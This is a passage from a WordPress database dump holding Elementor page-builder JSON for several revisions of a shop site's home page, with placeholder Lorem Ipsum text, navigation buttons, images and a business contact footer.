mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7957,1414,'_elementor_page_assets','a:0:{}'),(7959,1415,'_elementor_edit_mode','builder'),(7960,1415,'_elementor_template_type','wp-page'),(7961,1415,'_elementor_version','3.7.6'),(7962,1415,'_wp_page_template','elementor_canvas'),(7963,1415,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7964,1415,'_elementor_page_assets','a:0:{}'),(7966,1416,'_elementor_edit_mode','builder'),(7967,1416,'_elementor_template_type','wp-page'),(7968,1416,'_elementor_version','3.7.6'),(7969,1416,'_wp_page_template','elementor_canvas'),(7970,1416,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 